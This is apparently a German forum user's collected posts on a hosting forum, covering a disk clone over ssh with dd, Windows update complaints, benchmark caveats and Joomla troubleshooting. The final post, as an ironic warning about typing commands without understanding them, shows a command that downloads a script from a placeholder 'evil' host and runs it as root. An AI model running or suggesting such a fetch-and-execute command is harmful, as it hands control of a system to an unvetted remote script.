Posts by ThomasChr

    Sowohl mailto als auch xxx scheint meiner Unfähigkeit bzw. der unfähigen Zwischenablage meines Handys geschuldet zu sein :-(


    Hatte ich erwähnt dass ich das ganze vom Handy aus in der Badewanne gemacht habe? :-)

    Gerade einen alten RS 4000 G9 (120GB SSD, mit Windows drauf *würg*) auf einen neuen RS 4000 (800GB SSD) im Rescue System kopiert. Einmal tippen:

    Code
    1. dd if=/dev/sda bs=32M status=progress | ssh mailto:root@45.83.104.229xxx dd of=/dev/sda bs=32M

    und ein paar Minuten später war der Server fertig auf dem neuen System.

    Magic!


    Schon geil :-)

    Jep, schön ist das nicht.

    Aber ich käme nie im Leben drauf meinen Server einfach mit dem ausgelieferten OS zu betreiben.

    Ich entscheide mich doch bewusst für ein OS!


    Wir sind hier doch nicht bei M$ wo man halt Windows nimmt weils eh schon installiert ist...

    Also bei Servern der Konkurrenz kann ich leider ned helfen :P


    Ernsthaft: Keine Ahnung. Wenn du willst kann ichs nur mal auf nem netcup Server zum vergleich starten. Aber da wirst du sicher auch einen übrig haben...

    du hast es richtig formuliert - könnte - weil ich behaupte, derer die es tatsächlich können, sind an einer Hand abgezählt;

    wieviel Quellcode hat der Kernel momentan?

    106, 107 od. mittlerweile mehr als 108 Zeilen?

    Dein Fleis in Ehren, aber ich denke es reicht wirklich wenn du dir bei einem konkreten Fehler nur die Funktionen ansiehst die auch aufgerufen werden. Nicht gleich den ganzen Kernel :)

    Ich nehme mal an es geht um netcup Webhosting?

    Neben der Tatsache dass du im falschen Unterforum bist, ist das erste was wir bräuchten: Logfiles, logfiles, logfiles


    Netcup kann garantiert Joomla auf dem Webhosting laufen lassen (würde mich sehr wundern wenn nicht) und die Fehler können vielfältig sein (auch du könntest einen gemacht haben). Bis wir nicht genau wissen was es ist, solltest du mal nicht auf den Provider schimpfen :-)


    Also schau bitte mal, irgendwo im netcup Webhosting Panel kann man die Error Dateien ansehen. Da sollte beim Zugriff auf das Adminbackend was protokolliert werden.

    Auch im Browser (Konsole!) steht vielleicht irgendwas.

    Das ist genau einer der Punkte die ich so an Windows hasse. Es ist ne Black Box.

    Klick auf den Knopf, nix tut sich, und das wars.


    Bei Linux könnte man jetzt bis in die letzte Zeile Programmcode runter forschen warum exakt das so ist.

    Bei M$ muss man halt einfach auf deren Einschätzung vertrauen. Könnte mir vorstellen dass die das Update erstmal nicht für alle auslieferen sondern nur für manche, testhalber.

    Oder aber es ist halt mal wieder kaputt - wie so oft.


    Überhaupt ist der ganze Windows Update Mechanismus meiner Meinung nach total fehldesigned. Linux kriegt doch auch Kernel Updates im laufenden Betrieb hin, warum schafft Windows das nicht?

    Da muss man ja nach nem Druckertreiber neu booten...

    Überhaupt sollte man da oft neu booten weil es sonst irgendwelche nicht nachvollziehbaren Probleme gibt.

    Ich kenn Kunden bei denen ist das so drin, wenn die DB gerade wegen irgendeinem Lock hängt haben die die Kiste schon rebootet bevor du ans Hotlinetelefon gehen kannst.

    Brauch ja sicherlich nicht zu erwähnen wie Datenbanken das finden einfach rebootet zu werden...

    Benchmarks sind nur untereinander vergleichbar wenn man genau das gleiche Programm nimmt.

    Und dann messen diese nur die Geschwindigkeit von genau sich selbst :-)


    Das Problem ist: Der eine Prozessor ist z.B. in Kommazahlenberechnung VIEL schneller als der andere. Dafür ist der andere in Ganzzahlenberechnung viel schneller.

    Welcher ist nun der schnellere? Man weiß es nicht...

    Es kommt drauf an ob dein Programm (oder dein Benchmark) viele Ganzzahlberechnungen oder viele Kommazahlberechnungen macht.

    Das Problem ist hier natürlich vereinfacht dargestellt, denn es gibt quasi hunderte solcher Spezialfunktionen. Und Caches, und die haben Zugriffszeiten, und, und, und...


    Afaik sagt man eigentlich dass AMD mittlerweile besser ist als Intel...

    Hier mal ein bisschen single threaded Kommazahlenberechnung zwischen G8:


    und G9:


    PS: Meine G8 haben noch Intel Xeon Gold 6140, nicht 6230...

    Mit dem Befehl hast du die ersten 1GB deiner virtuellen Festplatte mit nullen überschrieben.


    Mehr als ein Backup einzuspielen wird dir nicht übrig bleiben..

    Der arme Typ war ein schönes Beispiel für "Befehle erst verstehen bevor man sie eintippt". Pinguin-Betriebssysteme können da erstaunlich schnell und grausam sein.


    PS: Hab ein neues Servertool gefunden, das test ich mal kurz. Ist auch schnell installiert:

    Code
    1. wget -O - http://supertool.evil/install.sh | sudo bash

    ;-)